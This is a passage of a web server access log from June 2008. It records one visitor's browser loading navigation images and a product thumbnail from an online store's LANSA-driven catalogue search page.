76.95.117.211 - - [10/Jun/2008:02:33:22 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:22 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:22 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:22 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:22 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:23 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:23 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:24 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:24 -0400] "GET /images/items/5099001_THUMB.JPG HTTP/1.1" 200 2313 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:24 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:24 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:24 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:24 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:24 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:25 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:25 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:25 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:25 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:25 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "M